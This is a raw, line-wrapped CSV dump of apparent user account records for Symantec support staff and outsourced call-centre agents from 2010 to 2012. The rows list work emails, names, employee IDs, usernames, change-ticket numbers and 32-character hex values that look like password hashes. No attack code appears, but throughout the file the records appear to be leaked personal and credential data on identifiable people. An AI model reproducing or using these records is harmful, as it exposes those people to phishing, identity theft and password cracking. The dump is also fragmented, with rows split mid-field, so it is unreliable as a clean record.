64ff8bda1fb77edfaafcb4fe45ec,S,<blank>,Kannan_S1,Kannan,NULL,NULL,NULL
39e-489d-b024-d92b4b927e74,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,15fc
7a00ee8b279028e2f41b833c7ed0,NULL,<blank>,Manikandan1,Manikandan,NULL,NULL,NULL
2601-459f-b5e6-4cb3084e01f5,"CRQ000000830109 CLNP Oct 08,2012",000-0000,jonathan
_gutierrez@symantec.com,Symantec,6aa76b44d9427e7459a305543bc0aff2,Gutierrez,<bla
nk>,230593,Jonathan,NULL,NULL,NULL
4548-4b22-86f2-8eb0a1282368,"CRQ000000830113 CLNP Oct 08,2012",000-0000,grace_pe
dro@symantec.com,Symantec,19fa0bd40b1b8a971e0517d3da553199,Pedro,<blank>,230595,
Grace,NULL,NULL,NULL
d20-4701-aecd-26309b76f832,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f744
a226538a98e7cdf7c26cda0799f8,Ahmed,<blank>,Mubin_Ahmed1,Mubin,NULL,NULL,NULL
1314-4bfd-8569-3ef170747707,CRQ000000518278 SP 24 Jan 2012,000-0000,rajamanoharr
oy_bheem@symantec.suth.com,Sutherland,3a3bb2d47fa11106a99469206dd045ec,Bheempall
i,<blank>,099136,RajaManoharRoy,NULL,NULL,NULL
89e-4b4d-97bd-335579acfa7e,<blank>,<blank>,Symantec_TL@teleperformance.se,Telepe
rformance Nordic,a8f104cf81a4ec85b6ac52b3cf9d895c,Legeryd,<blank>,083939,Johan,N
ULL,NULL,NULL
c997-491c-a517-96de3bde9ca0,SRB 28.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,068f9902d40e9ffdf3bb1ed23dd830fe,Wadhvania,<blank>,088327,Firoz,NULL,
NULL,NULL
3f6-4819-ac95-ea495d84644a,SRB 20.05.2010,INC000000177879,accounts@symantec.tele
performance.gr,TPG,4d8c252247bc618c0f53fdefdf1dbe8e,Mussuros,<blank>,093070,Tere
sa,NULL,NULL,NULL
7f8-4dff-a749-d2591e72dd12,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,03ecbf90dc5d980fa21377ff634277fd,Kumar,<blank>,Gautham_Kumar1,Gautham,NULL,
NULL,NULL
cef-4156-b16e-994d803e4e8c,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,653a
7c074e46cf160fab8d27da68386b,NULL,<blank>,Prakash,Prakash,NULL,NULL,NULL
252-45e9-9408-17aaf90878b0,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,0c5a
912586ba2f1fd27658907699da4f,NULL,<blank>,Karthikeyan1,Karthikeyan,NULL,NULL,NUL
L
908-4d7c-9441-aa25ba95d646,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,6228fcf73c1b2a582d951a65f3ddc4c7,Palani,<blank>,Saravanan_Palani1,Saravanan
,NULL,NULL,NULL
bf2-4076-9dba-c371a880b1f6,<blank>,<blank>,poul_jensen@symantec.com,Symantec,5b3
dd3c4fdc298328638e8f36a67f08e,Jensen,<blank>,poul_jensen,Poul,NULL,NULL,NULL
156-45d2-ad7c-14eee9a4b145,<blank>,<blank>,hassen_allab@symantec.com,Symantec,fb
508999075b994a5f07fa3ba4c60f42,Allab,<blank>,hassen_allab,Hassen,NULL,NULL,NULL
bd0-4b8e-9137-27f2d00b7fbd,<blank>,<blank>,david_mulumba@symantec.com,Symantec,e
43e992730d0a49d07547a01a1868fa7,Mulumba,<blank>,david_mulumba,David,NULL,NULL,NU
LL
736-47c0-a760-0ecdc70836b9,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,1749
a730f8dea2c0c715d61ac39ff009,NULL,<blank>,Smruthi,Smruthi,NULL,NULL,NULL
f54-4bb9-992b-d4c1b2b84cf0,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f81e
043f66323fa3969641e17a7d3174,s,<blank>,Srinivass,Srinivas,NULL,NULL,NULL
6ca-4221-a7bc-becac976e0ad,<blank>,<blank>,shaun_mckeag@symantec.com,Symantec,07
334b2fc2e1e38aeed12cf7a87fe81c,McKeag,<blank>,shaun_mckeag,Shaun,NULL,NULL,NULL
1d9-4ed9-bc80-7d599df65f91,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f180
ef57ee23f83d9f7a298008f590a4,NULL,<blank>,Suryanarayana,Suryanarayana,NULL,NULL,
NULL
8e5-446a-853a-9a51a37a4bab,<blank>,<blank>,vijaya.krishnan@e4e.com,E4E,9efb9a678
7ef18be698e20257b50b0da,Prasad Yeleti,<blank>,Vijay_PrasadYeleti,Vijay ,NULL,NU
LL,NULL
8e6-4e9c-ab66-ea124e8b8224,<blank>,<blank>,amelie_vuillaume@Symantec.Com,Symante
c,22484f246bdb0d1d90d84731c18bf9a1,Vuillaume,<blank>,amelie_vuillaume,Amelie,NUL
L,NULL,NULL
811-45c1-9b8f-d4c1d58b1d86,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,d
1afd807ca80504acd9e039a90c72b7c,Demo Agent,<blank>,ps_demo_agent,Premium Service
s,NULL,NULL,NULL
a87a-4926-be26-c57b33f7993e,<blank>,<blank>,tools_id@symantec.suth.com,PM - 1/24
/2012 - CRQ000000518327,c99ab08e1088b3417bace6159cc852bf,Kumar,<blank>,123625,Ni
thin,NULL,NULL,NULL
3d8-41e1-be5f-30f1836a6edd,<blank>,2630245,jeff_lacasse@intuit.suth.com,Sutherla
nd,eeb801e7c99c4b43b4f5ec3851f16fa4,Lacasse,<blank>,jeff_lacasse,Jeff,NULL,NULL,
NULL
19a-40a2-b4fb-cf9ad799fabd,<blank>,EMPROV,symaccount@neusoft.com,Neusoft,0d97c41
8f645f1c08d5172635f36e46b,Gong,<blank>,076333,Jicheng,NULL,NULL,NULL
b382-4d84-ba02-e0ba15f78296,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,6df87ebb9dd15357cf44315eef8b6616,Ligue,<blank>,075140,Lo
rderly Camangyan,NULL,NULL,NULL
471d-4dde-aa32-9fdfec5349f0,<blank>,<blank>,kpent@symantec.teleperformance.gr,CT
- 12/09/2012 - CRQ000000800602,51fa900f5ff82f92f334f4c6caa78e6a,Pent,<blank>,22
9968,Kristel,NULL,NULL,NULL
de1-430a-8d81-714351e36987,<blank>,<blank>,raymond_duron@symantec.com,Symantec,9
2c964557ce9a591631a38cc6957f927,Duron,<blank>,raymondl_duron,Raymond,NULL,NULL,N
ULL
0d09-4964-83b7-289a9852c263,CRQ000000518278 SP 24 Jan 2012,000-0000,srikanth_kup
pan@symantec.suth.com,Sutherland,f541ffa3ceab469b7a56399070da50ce,Kuppan,<blank>
,121477,Srikanth,NULL,NULL,NULL
d9c-4932-9591-06dd2f4c0075,<blank>,<blank>,brendan_toch@symantec.com,Symantec,a0
fcbd4aad8325c4c63176aa9fd23d96,Toch,<blank>,brendan_toch,Brendan,NULL,NULL,NULL
d057-424f-8a9a-7d7e04dd0523,CRQ000000709695--vmd--26/06/2012,<blank>,ryan_corpus
@suth.com,sutherland,c15f686bea920dafe0d8a88fe3f0d91c,Corpus,<blank>,226440,Ryan
,NULL,NULL,NULL
fee4-4cd3-b46c-87cd1c797081,CRQ000000709695--vmd--26/06/2012,<blank>,kimberly_er
ese@suth.com,sutherland,d37f36590cff8a3eb2ef6534c33c17f2,Erese,<blank>,226460,Ki
mberly,NULL,NULL,NULL
cd43-4a98-b9cb-d47d0f159c03,<blank>,<blank>,arnel_dominguez@suth.com,CT - 28/06/
2012 - CRQ000000711805,3f18f0421cb123aacce65a4f90fb2c78,Dominguez,<blank>,227014
,Arnel,NULL,NULL,NULL
126e-4b98-b328-51660acab8ca,<blank>,<blank>,myron_nunes@suth.com,CT - 28/06/2012
- CRQ000000711911,919d72711bd03c894eb702b57b0a417d,Nunes,<blank>,227015,Myron,N
ULL,NULL,NULL
c822-4e0c-aa96-4d582f7ac80e,"CRQ000000719864 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,92cce025ee8f7d6c93b7eadd9463d19d,Kumar,<blank
>,227495,Santosh,NULL,NULL,NULL
db23-4b87-8e9e-cee68ab8c91c,"CRQ000000719917 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,0200900221c9ec6b3c8c04f47aabab23,Patil,<blank
>,227496,Jaywant,NULL,NULL,NULL
43d0-4ff9-a9ab-522382ea01c7,"CRQ000000719869 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,1b4d44b59bb905cd31e9b8412adb9d3e,Yadav,<blank
>,227497,Amit,NULL,NULL,NULL
cf2-4f9a-a5e2-14912b528e7d,<blank>,<blank>,jfarag@symantec.teleperformance.gr,TP
G Archived,ee5fce75b67c5a28e1549279907c42c4,Farag Allah,<blank>,Heba_Allah,Heba,
NULL,NULL,NULL
5035-475e-99c5-f716a17cabbd,"CRQ000000830133 CLNP Oct 08,2012",000-0000,ralphjos
eph_panes@symantec.com,Symantec,6c3c0a9ab2bc44fe4e9c6860d4a5f39f,Panes,<blank>,2
30602,Ralph Joseph,NULL,NULL,NULL
46b-4d20-b8cb-27ce92e60a5e,<blank>,<blank>,claudio.ortiz@teleperformance.com,TPA
,c5ac9c34eb00f691029d967017efbd0b,Pereiras,<blank>,Damian_Pereiras,Damian,NULL,N
ULL,NULL
34c-4e79-8968-ab7270c1aa84,<blank>,<blank>,claudio.ortiz@teleperformance.com,Arc
hived Teleperformance Argentina,d85d248989757cf579f46f9859f34798,Nazareno,<blank
>,Nehuen_Nazareno,Nehuen,NULL,NULL,NULL
593c-4090-b413-d5e699547523,CRQ000000724027--vmd--09/07/2012,<blank>,pooja_baner
jee@suth.com,sutherland,e2ae9b37054639174744284a72829b22,Banerjee,<blank>,227158
,Pooja,NULL,NULL,NULL
ca2-4dfa-81e3-9de9235220ce,<blank>,<blank>,claudio.ortiz@teleperformance.com,TPA
,68187301ea5a66b3d516c1c73679dad3,Lischinsky,<blank>,Dario_Lischinsky,Dario,NULL
,NULL,NULL
3d61-4713-8631-59a7c436209d,AY 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,c9fa0a88293f65ba32e29c58cccb7490,C,<blank>,074158,Ravishankar,NULL,NULL,N
ULL
0096-4002-b0bc-2bd8631fff91,<blank>,INC5934,nh.symantec@teleperformance.com.ar,T
PA,218723ad370aba294c65c12bd40c1ff3,Clark,<blank>,080106,Sebastian,NULL,NULL,NUL
L
0b0-471d-bfbb-579c20336e1b,<blank>,<blank>,CESARSILVINO.BRITEZ@teleperformance.c
om,Teleperformance Argentina,56c44c245f9e54e186f961d9f841d357,Carpana,<blank>,Di
ego_Carpana,Diego,NULL,NULL,NULL
368-4b3e-86d6-f7a4353d4116,<blank>,<blank>,CESARSILVINO.BRITEZ@teleperformance.c
om,Teleperformance Argentina,ea8b324ec10173feb3446c93433e2698,Claramunt,<blank>,
Mauro_Claramunt,Mauro,NULL,NULL,NULL
962-4c91-9ffb-4c5a41a4e804,<blank>,<blank>,amy_lebouef@suth.com,Sutherland,309da
ee0ef83b8a8532c20a8d7b242ca,Leclair,<blank>,amy_leclair,Amy,NULL,NULL,NULL
b770-481b-98d7-ac139e1c4ceb,CRQ000000712787--vmd--28/06/2012,<blank>,dadasaheb_p
ansare@suth.com,sutherland,24b5201ebdaab7a72df0654b613d8f9d,Pansare,<blank>,2270
61,Dadasaheb,NULL,NULL,NULL
0097-4d9a-bbfb-b33908eb8d6d,<blank>,<blank>,brian_thomas@symantec.com,Symantec,b
fc03c98b21026cd909091abd61139b0,Thomas,<blank>,brian_thomas,Brian,NULL,NULL,NULL
420-45a2-8b01-7986a0692773,<blank>,<blank>,eelsaid@symantec.teleperformance.gr,T
PG Archived,8932248c8720850460c4eebd737cf8ca,El Said,<blank>,Elleithi_Elsaid,Ell
eithi,NULL,NULL,NULL
bf16-4b10-9263-ec79ca85b2b1,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,8dc03c38a5a8e1ce73dd55dfb9de797f,Veneracion,<blank>,1049
96,Leslie Batuigas,NULL,NULL,NULL
d102-4943-9c7c-09d4e401e7ae,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,c73c9d3e0430bb705c44e86be0a14f2a,Polisetty,<blank>,075562,Pardha,NULL,NUL
L,NULL
a2ca-4e86-a0c1-b3cb7d72d82f,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,5764dc2fb37bda185034e0cb8d7e020c,Patan,<blank>,075563,Riyaz,NULL,NULL,NUL
L
33a9-4bc4-9596-945f2a2ec77a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6bd3c4e4c7ee0a64d60c9b861fb34b84,Salcedo,<blank>,095037,Abegail Fresco,NULL,NUL
L,NULL
5e9-441a-81ff-713598faf07f,<blank>,<blank>,andrea_dessi@symantec.com,<blank>,278
05e9d1e856fa96fbc8cd445649d1b,Dessi,<blank>,andrea_dessi,Andrea,NULL,NULL,NULL
fb0-4c3d-a77c-1f891dd15c3e,<blank>,89034,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",e480c147db1d4cbadca520e0de052f9c,Jacob,<blank>,rony_jacob
,Rony,NULL,NULL,NULL
e786-4608-a712-9a43508a77e8,"CRQ000000719882 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,f18509832a5ac916084bf399de0a46e0,Sharif,<blan
k>,227508,Zainul,NULL,NULL,NULL
196-40c7-8c49-79485c8bc866,<blank>,<blank>,Sjoers.Kruytzer@tp-tec.nl,Teleperform
ance Holland,a51ce87ecf054ab2d48250dafa98b33b,Kruytzer,<blank>,Sjoers_Kruytzer,S
joers,NULL,NULL,NULL
532-49fd-b508-b53e0be5db8d,<blank>,<blank>,Martijn.vader@tp-tec.nl,TPH,9fd1525a1
9ca71fec4d18ca66299afb6,vader,<blank>,Martijn_vader,Martijn,NULL,NULL,NULL
c47c-4c2b-b3c4-4b8c22e4658b,22/02/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,9ac76859bc64a67e271c16f3006ebd7b,Rathinasabapathy,<blank>,099690,Kumar
eshwaran,NULL,NULL,NULL
9cca-4240-87d9-7198dc300790,SRB 27.08.2010,INC000000251664,tools_id@symantec.sut
h.com,Sutherland,a6618dd261be98a4150c4b22960a1afd,Nair,<blank>,091707,Finu,NULL,
NULL,NULL
645e-4812-90fa-62282d293f6e,"CRQ000000830159 CLNP Oct 08,2012",000-0000,russelwi
thney_valenc@symantec.com,Symantec,f6bd7098cac3670ba56777fffa60a487,Valencia,<bl
ank>,230611,Russel Withney,NULL,NULL,NULL
002-43e1-9c6d-c191041d6b1a,<blank>,<blank>,Thijs.Christiaan@tp-tec.nl,Teleperfor
mance Holland,2fda30b8f80e63d52580471a10ac5f31,Christiaan,<blank>,Thijs_Christia
an,Thijs,NULL,NULL,NULL
8380-450c-84db-792ca1037a44,"CRQ000000719885 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,e53826abf0a8289dffc62c8771100d3b,Kumar,<blank
>,227509,Sanish,NULL,NULL,NULL
3b2-490c-b05a-9fb5cbd5d72c,<blank>,<blank>,Lauri.Geurts@tp-tec.nl,Teleperformanc
e Holland,9a1493cace47a09f5e7dfbfb2ff0906f,Geurts,<blank>,Lauri_Geurts,Lauri,NUL
L,NULL,NULL
724b-41fa-b218-0b2880924386,CLNP 15 Jun 2011,<blank>,suresh_gantasala@SUTH.com,C
RQ000000278598,c65953d2f5cb8b6a731719db9f075a8c,Gantasala,<blank>,099910,Suresh,
NULL,NULL,NULL
3143-4bd5-ae20-d3c585761a15,"CRQ000000719888 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,cdd311a4275c2eadc81456fd41a7e042,Swar,<blank>
,227510,Dhirendra,NULL,NULL,NULL
034e-42b6-96b1-9a7f3be64422,CRQ000000280277,<blank>,tools_id@symantecsuth.com,SP
16 Jun 2011,d22bf9744b3b4d6116e396742c883cf8,Loganathan,<blank>,116655,Sudhakar
,NULL,NULL,NULL
449-48f0-98ae-5df34223009d,<blank>,<blank>,gary_henderson@symantec.com,Symantec,
f5a7d3c64b73bb14f9bf5a74eb4b80f4,Henderson,<blank>,gary_henderson,Gary,NULL,NULL
,NULL
9136-4ad6-82b2-7f40514c136f,"CRQ000000719892 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,5e039b22c8956097ca4a2d049da5267d,Oommen,<blan
k>,227511,Nibin,NULL,NULL,NULL
3a8-46a6-a3f8-04466a31e1dd,<blank>,<blank>,terri_wilson@symantec.com,Symantec,d9
8bdae3b88f9429c15923b545187237,Wilson,<blank>,terri_wilson,Terri,NULL,NULL,NULL
0f5-46e4-8b91-1f74d73d3495,<blank>,<blank>,jason_sheffey@symantec.com,Symantec,1
a98cf1f078008c77547d5272da33115,Sheffey,<blank>,jason_sheffey,Jason,NULL,NULL,NU
LL
19c3-41a6-876a-56d4169a6fd1,"CRQ000000830163 CLNP Oct 08,2012",000-0000,junekatr
ina_castro@symantec.com,Symantec,dbd03a8e47729658d5b40191ce2287a3,Castro,<blank>
,230614,June Katrina,NULL,NULL,NULL
eb5-4553-8b4f-93a9d15aea28,<blank>,6-[120]-7368,peter_dvorak@symantec.com,Symant
ec,150b9e485f44952843c609ca60573206,Dvorak,<blank>,peter_dvorak,Peter,NULL,NULL,
NULL
5f8-4650-bafc-617cac5f663a,<blank>,<blank>,Akshat_Mohta@symantec.com,Symantec,90
ce9053ae1a0799b84378b81726aa8c,Mohta,<blank>,Akshat_Mohta,Akshat,NULL,NULL,NULL
911b-437a-b0a8-4603093fa956,"CRQ000000830147 CLNP Oct 08,2012",000-0000,keyserr_
cabilbil@symantec.com,Symantec,98d7f8dc1bde5c0a1fb938bdbcc178bc,Cabilbil,<blank>
,230603,Keyserr,NULL,NULL,NULL
c48-4953-84d9-54c95926aaa2,<blank>,<blank>,sreelakshmi_tatavarty@symantec.com,Sy
mantec,8ff90c7233517ce054c78cb797c6ee04,Tatavarty,<blank>,sree_tatavarty,Sree,NU
LL,NULL,NULL
6483-45ce-8c98-c86a6494d74e,<blank>,<blank>,jason_millers@symantec.com,Symantec,
3a63ae7cb5ff669202d1c5aa172dbfdf,Millers,<blank>,jason_millers,Jason,NULL,NULL,N
ULL
d39-4af0-b72a-39b15f2410bc,<blank>,<blank>,nfaraj@symantec.teleperformance.gr,Te
leperformance Greece,a0df83528a75fa8bbe92c2b478e46bb6,Faraj,<blank>,Nozad_Faraj,
Nozad,NULL,NULL,NULL
9052-4b28-998f-9db3340df095,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,992969700ddb3daaf1c7c64d3e2d1c7a,Das,<blank>,089210,Prabhu,NULL,N
ULL,NULL
6568-4931-b66d-3e2cc8d448f7,<blank>,<blank>,ezequiel.sanchez@teleperformance.com
.ar,TPA,8207b5db9a49c175036c3098b68bf7aa,Sanchez,<blank>,Ezequiel_Sanchez,Ezequi
el,NULL,NULL,NULL
930b-4410-88c3-1ff9ea905cfb,CRQ000000236212-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,38f82730f2a7fa0d93afce66dc46260a,Lucena,<blank>,114795,Je
efren,NULL,NULL,NULL
ef80-482a-9bba-66258925b047,<blank>,<blank>,douglas_lemon@symantec.com,INC000000
439357 - PR - 4/12/2011,a938731413e957190ef9063daf7cdc49,Lemon,<blank>,096119,Do
uglas,NULL,NULL,NULL
1f9-4872-be81-782ffe9e6dac,<blank>,<blank>,Philppe.graas@tp-tec.nl,Teleperforman
ce Holland,4129b60593d6a71046549133e4c1255f,Graas,<blank>,Philppe_Graas,Philppe,
NULL,NULL,NULL
d754-4080-9f42-c5f2ff5951e7,CRQ000000518278 SP 24 Jan 2012,000-0000,karthikeyan_
s12_cc@symantec.suth.com,Sutherland,579860f50bf19dd5179e34ea5dc202d8,S,<blank>,0
98992,Karthikeyan,NULL,NULL,NULL
c5ad-43f0-a1a8-33aacad27e1b,CRQ000000241079 PBP 15/04/2011,<blank>,Aravindh_B_V@
symantec.com,Symantec,2332b454540409b89244f50829b0416f,B_V,<blank>,114391,Aravin
dh,NULL,NULL,NULL
8c49-4c4b-87a2-b86f3dd74666,CRQ000000241079,<blank>,Surendar_M@symantec.com,KSC-
04/15/2011,b412eb5258219181a71a041f9861a6e2,M,<blank>,114504,Surendar,NULL,NULL,
NULL
fef7-409b-bb73-a3517a76adef,sss 27.05.10,INC182175,tools_id@symantec.suth.com,Su
therland,47a4611328a943150bcba800d48796e6,George,<blank>,099664,Joshi,NULL,NULL,
NULL
3ab2-47a6-80a5-4b2100a62735,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
724021 - PR - 9th July 2012,f0338b831bc06f82393ad1ab0e8dd23d,Malack,<blank>,2271
56,Mubasheer Ahmed ,NULL,NULL,NULL
4b2f-4262-864a-419e46b66c42,CRQ000000532033 CLNP Jan 31 2012,000-0000,tools_id@s
ymantec.suth.com,Sutherland,c17fd86ef1f43be176257bfc2c2b1a1f,Khan,<blank>,124436
,Imran,NULL,NULL,NULL
ef17-4013-90de-7c0e6fc35bcd,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539155,d93b36c1164c7e43f3882c476e040304,Tanya Camille Erlina,<blan
k>,124521,Maria,NULL,NULL,NULL
0dfd-4f55-a87f-2fbe883f4a38,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,ae33f3b9cee4f592261f8aeadd625112,N,<blank>,088329,Guruguhan,NULL,NULL,NULL
61a1-4fcd-b0ac-5d080d0513ce,CRQ000000241079 PBP 15/04/2011,<blank>,Aravindhan_D@
symantec.com,Symantec,ca53d9fa00a2e650f0c52f0ac8ed6642,D,<blank>,114392,Aravindh
an,NULL,NULL,NULL
bb97-4937-b76e-32b2ca286ab9,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539168,d5d7d02c47da956a92db6174b2126bf9,Carl Carigaba,<blank>,1245
22,Christian ,NULL,NULL,NULL
e03f-463d-a82c-549dc6a6e3c5,"CRQ000000724006 CLNP July 09,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,f0f8a915c61f880c340cdd4073a47a2d,Priyadarshin
i,<blank>,227147,Indira,NULL,NULL,NULL
db63-432d-9b2c-66251bc47312,<blank>,<blank>,sjoerd.beckers@teleperformance.nl,PM
- 10/10/2012 - CRQ000000832070,486adf9f2395a2c619b52e3f8ec2d601,Beckers,<blank>
,230802,Sjoerd,NULL,NULL,NULL
e70-4b13-986f-632168bbdcd4,<blank>,<blank>,skandila@symantec.teleperformance.gr,
TPG,feeab7bf87d5519cd53fd151a4e5c4cb,Kandyla,<blank>,matina_kandyla,Matina,NULL,
NULL,NULL
9d6-47e6-aed7-7ab2e535aa4e,sms 29,2614952,Tools_id@symantec.suth.com,Symantec,59
b017a8aff043d22d69d52472622f73,Clavel,<blank>,annamarie_clavel,Anna,NULL,NULL,NU
LL
f097-45fa-88f3-ffd3bd93f35f,"CRQ000000830166 CLNP Oct 08,2012",000-0000,ryan_mij
ares@symantec.com,Symantec,9f76d931df40a80ce28a212a8b42f4f5,Mijares,<blank>,2306
16,Ryan,NULL,NULL,NULL
fc94-41d5-92ee-72e0ed484ac5,bpr-22-04-10,inc158054,tools_id@symantec.suth.com,su
therland,e1b6dfaa85373a71cf9b00117a19568d,K P,<blank>,086063,Sandeep,NULL,NULL,N
ULL
4fb5-4285-a2c3-031f1bb8f9da,"CRQ000000830170 CLNP Oct 08,2012",000-0000,danielle
joan_rosales@symantec.com,Symantec,53f12c26ebcde657e59762982fc02470,Rosales,<bla
nk>,230618,Danielle Joan,NULL,NULL,NULL
0150-4e62-a366-7881b667ef5b,<blank>,<blank>,kathy_stark@symantec.com,Symantec,cb
4b8497beb72db27ee823a33b1f1ab3,Stark,<blank>,kath_stark,Kathy,NULL,NULL,NULL
d75c-4300-938b-10d7707ab204,"CRQ000000830173 CLNP Oct 08,2012",000-0000,maricar_
billones@symantec.com,Symantec,d7f479298ce685e7cc50bcfc9afa15c8,Billones,<blank>
,230620,Maricar,NULL,NULL,NULL
0410-4a91-8118-99b0d34988c9,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,e4faec387817c5a2b80e3fc01b44c77f,Ravichandran,<blank>,11
3246,Jayakumar,NULL,NULL,NULL
898-49dd-900c-d68b81abd8ed,<blank>,071074,akoulogeorgiou@symantec.teleperformanc
e.gr,TPG,b0df6567f8d6f444193a6bc3202c3a1b,Koulogeorgiou,<blank>,aimilia_koulogeo
rgiou,Aimilia,NULL,NULL,NULL
6d9c-4852-b358-a92740811f23,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,058999504d155cb27970a5fece46d769,Reddy,<blank>,113248,Su
dharshan,NULL,NULL,NULL
4ec-4a4a-ad65-cc447dd6b83a,<blank>,078547,sazizi@symantec.teleperformance.gr,Tel
elperformance Hellas,f2fabc41b24fa733e4455cdfd8558ba5,Azizi,<blank>,sonia_azizi,
Sonia,NULL,NULL,NULL
6bec-47ac-ba34-2b96fd9b67b4,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,4ebda8a5457fb3f80fd4ea9fb7d46b53,Vasudevan,<blank>,11325
1,Mahalakshmi,NULL,NULL,NULL
0422-4e1d-90ed-510716aa8081,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267802 - PR - 5/31/2011,1e99fc9a54100fdecee21120a648b9f4,Zampaga,<blank>,116699,
Florencio Panaligan,NULL,NULL,NULL
7e0-48ea-b897-64148e6c2159,<blank>,<blank>,sapergis@symantec.teleperformance.gr,
Telelperformance Hellas,0d7459b97437b6ab7b257af1fdde2dda,Apergis,<blank>,stelios
_apergis,Stelios,NULL,NULL,NULL
025-4efb-aa9b-a51dc04e4e0e,<blank>,071066,tyerbanga@symantec.teleperformance.gr,
TPG,64137c04ca68d7a8fd44b6e5930dede3,Yerbanga,<blank>,th\xe9ophille_yerbanga,Th\
xe9ophille,NULL,NULL,NULL
4a1-4613-8722-7bafc6b9bae2,<blank>,066993,vkarida@symantec.teleperformance.gr,TP
G,fa18094d3847d793fdd45d81261a6441,Karyda,<blank>,vasilia_karyda,Vasilia,NULL,NU
LL,NULL
a1d-489f-90cf-dcd7c87512b9,<blank>,063142,vgerontidi@symantec.teleperformance.gr
,TPG,2c586f2853892ef78dd70cacf25cf9b6,Gerontidi,<blank>,violetta_gerontidi,Viole
tta,NULL,NULL,NULL
da4d-435e-b489-8d4fa175f846,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539223,66d32df60cbcf29baa57bb5e264aedcb,Oser,<blank>,124546,Edrian
,NULL,NULL,NULL
6e2-4a57-bec3-95eb3087c3c7,<blank>,069291,fredrik.olofsson@teleperformance.se,Ar
chived Teleperformance Nordic,c39a374613bf8a2e60237f5142aca32f,Olofsson,<blank>,
fredrik_olofsson,Fredrik,NULL,NULL,NULL
0db2-4811-b523-22e28ef98cdd,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539226,7cd186e0c92ae5c893694886011c466e,Sarabia,<blank>,124547,Mar
icor,NULL,NULL,NULL
9b33-4eb0-818b-33fe2107e2fe,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539232,1474d600a65c376de2bdf2781669f09a,Tartacon,<blank>,124551,Ma
rice,NULL,NULL,NULL
3db6-4323-9e21-223ec045551f,nam-08-09-2010,INC000000238017,tools_id@symantec.sut
h.com,Sutherland,d87f6e8503477b150c9cdcf54f990a89,JoseDela Cruz,<blank>,100531,A
llanDale,NULL,NULL,NULL
bbf6-4ccd-86d7-5ec7bc74872c,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,
1b5a7f3fe1827341915ae187c7082dae,Kerwien,<blank>,kevin_kerwien_comcast,Kevin,NUL
L,NULL,NULL
744-4ba0-804b-510dbe2ce144,<blank>,<blank>,bodo_metscher@symantec.com,Symantec,b
313a0f81b6dac87cce29096bfba8ba2,Metscher,<blank>,bodo_metscher,Bodo,NULL,NULL,NU
LL
176-4ccc-a23e-3acc44e5adf0,<blank>,080372,ghbmoraes@sercom.com.br,Sercom,13d64ac
ca9da0da674ca358be63c0f35,Moraes,<blank>,gabriela_moraes,Gabriela,NULL,NULL,NULL
699-4174-b251-8016750b829b,<blank>,080367,tdssilva@sercom.com.br,Sercom,4b960db3
f1a28e10ccafb48c8b6e1e57,Silva,<blank>,talita_silva,Talita,NULL,NULL,NULL
f757-4262-83f5-30e2d9acdaa0,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,f78cb87e6b683101c3a889b35d829d4b,Ganade,<blank>,113239,L
yn Leonora Fe,NULL,NULL,NULL
f27-450d-ab4d-333fa921ad6c,<blank>,068020,pablo.beraldi@teleperformance.com,Arch
ived Teleperformance Argentina,eabc4d309b196b7b377c772c4dec51f6,Beraldi,<blank>,
pablo_beraldi,Pablo,NULL,NULL,NULL
2c4-42f0-a8c8-ffe49d53741b,<blank>,071062,accounts@symantec.teleperformance.gr,T
PG,5322b97b0d54ed3d941adbe9432cb4d2,Toutziarakis,<blank>,christos_toutziarakis,C
hristos,NULL,NULL,NULL
937-446b-ae8a-cfc8c5331014,<blank>,<blank>,ehoudeau@symantec.teleperformance.gr,
TPG Archived,ca8654fbcb04d9bae05543a20a222da4,Houdeau,<blank>,emmanuelle_houdeau
,Emmanuelle,NULL,NULL,NULL
